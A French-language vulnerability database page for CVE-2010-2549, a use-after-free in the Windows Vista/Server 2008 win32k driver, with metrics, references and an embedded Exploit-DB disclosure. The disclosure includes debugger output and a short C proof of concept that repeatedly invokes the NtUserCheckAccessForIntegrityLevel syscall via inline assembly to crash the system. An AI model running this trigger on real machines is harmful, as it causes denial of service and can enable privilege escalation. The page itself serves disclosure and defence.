CVE-2010-2549 : Détail

CVE-2010-2549

3.81%V4
Local
2010-07-02
16h30 +00:00
2017-09-18
10h57 +00:00
CVE.org
NVD
Notifications pour un CVE
Restez informé de toutes modifications pour un CVE spécifique.
Gestion des notifications

Descriptions du CVE

Use-after-free vulnerability in the kernel-mode drivers in Microsoft Windows Vista SP1 and SP2 and Server 2008 Gold and SP2 allows local users to gain privileges or cause a denial of service (system crash) by using a large number of calls to the NtUserCheckAccessForIntegrityLevel function to trigger a failure in the LockProcessByClientId function, leading to deletion of an in-use process object, aka "Win32k Reference Count Vulnerability."

Informations du CVE

Faiblesses connexes

CWE-ID Nom de la faiblesse Source
CWE-399 Category : Resource Management Errors
Weaknesses in this category are related to improper management of system resources.

Métriques

Métriques Score Gravité CVSS Vecteur Source
V2 7.2 AV:L/AC:L/Au:N/C:C/I:C/A:C nvd@nist.gov

EPSS

EPSS est un modèle de notation qui prédit la probabilité qu'une vulnérabilité soit exploitée.

Score EPSS

Le modèle EPSS produit un score de probabilité compris entre 0 et 1 (0 et 100 %). Plus la note est élevée, plus la probabilité qu'une vulnérabilité soit exploitée est grande.

Percentile EPSS

Le percentile est utilisé pour classer les CVE en fonction de leur score EPSS. Par exemple, une CVE dans le 95e percentile selon son score EPSS est plus susceptible d'être exploitée que 95 % des autres CVE. Ainsi, le percentile sert à comparer le score EPSS d'une CVE par rapport à d'autres CVE.
EPSS First.org

Informations sur l'Exploit

Exploit Database EDB-ID : 14156

Date de publication : 2010-06-30 22h00 +00:00
Auteur : MSRC
EDB Vérifié : Yes

Windows Vista/Server 2008 NtUserCheckAccessForIntegrityLevel Use-after-free Vulnerability Intro: Due to hostility toward security researchers, the most recent example being of Tavis Ormandy, a number of us from the industry (and some not from the industry) have come together to form MSRC: the Microsoft-Spurned Researcher Collective. MSRC will fully disclose vulnerability information discovered in our free time, free from retaliation against us or any inferred employer. Vulnerability report: win32k!NtUserCheckAccessForIntegrityLevel in Vista/Server 2008 calls LockProcessByClientId() on the specified ClientID. When this call fails, the refcount will be first decremented by nt!ObfDereferenceObject and then by win32k!NtUserCheckAccessForIntegrityLevel again, resulting in a refcount leak. The refcount leak can be abused to have an in-use process object deleted. (use-after-free) Some debugging info: kd> vertarget Windows Server 2008 Kernel Version 6002 (SP2) kd> LM m win32k start end module name 8d460000 8d663000 win32k kd> BA e 1 8d58d710 \"dt nt!_OBJECT_HEADER @edx PointerCount; g\" kd> g +0x000 PointerCount : 145 +0x000 PointerCount : 144 +0x000 PointerCount : 143 ... +0x000 PointerCount : 3 +0x000 PointerCount : 2 +0x000 PointerCount : 1 *** Fatal System Error: 0x00000018 kd> kc nt!KeBugCheck2 nt!ObfDereferenceObject win32k!NtUserCheckAccessForIntegrityLevel nt!KiFastCallEntry The vulnerability can be triggered in one line below, where 4 is just the PID of PsInitialSystemProcess. while (1) NtUserCheckAccessForIntegrityLevel(4, 0, NULL); Since there's no exported stub for this system call, you'll have to craft the call manually. sysenter is your friend. http://j00ru.vexillium.org/win32k_syscalls/ POC: #include <windows.h> #define LEAK_ME 0x1151 int main(int argc, char *argv[]) { /* get us some win32k! */ LoadLibrary("user32"); while (1) { __asm { mov eax, LEAK_ME push 0 push 0 push 4 lea edx, dword ptr [esp] int 0x2e } } } Workaround: Microsoft can workaround these advisories by locating the following registry key: HKCU\\Microsoft\\Windows\\CurrentVersion\\Security and changing the "OurJob" boolean value to FALSE. We at MSRC would like to help you, the users, work around this issue, but PatchGuard will not allow us ;-( Current MSRC Members (alphabetical order!): XX XXXXXX XXXX XXXXXXXX XXXXX XXX XXXXXXX XXXXXXX XXXXXX XXXXXXXXX XXXXX XXXXXXXX If you wish to responsibly disclose a vulnerability through full disclosure or want to join our team, fire off an email to: msrc-disclosure () hushmail com We do have a vetting process by the way, for any Microsoft employees trying to join ;-)

Products Mentioned

Configuraton 0

Microsoft>>Windows_server_2008 >> Version *

Microsoft>>Windows_server_2008 >> Version *

Microsoft>>Windows_server_2008 >> Version *

Microsoft>>Windows_server_2008 >> Version *

Microsoft>>Windows_server_2008 >> Version *

Microsoft>>Windows_server_2008 >> Version -

Microsoft>>Windows_vista >> Version *

Microsoft>>Windows_vista >> Version *

Références

http://seclists.org/fulldisclosure/2010/Jul/3
Tags : mailing-list, x_refsource_FULLDISC
http://www.exploit-db.com/exploits/14156
Tags : exploit, x_refsource_EXPLOIT-DB
http://www.securityfocus.com/bid/41280
Tags : vdb-entry, x_refsource_BID
http://secunia.com/advisories/40421
Tags : third-party-advisory, x_refsource_SECUNIA
http://www.us-cert.gov/cas/techalerts/TA10-285A.html
Tags : third-party-advisory, x_refsource_CERT
http://osvdb.org/66003
Tags : vdb-entry, x_refsource_OSVDB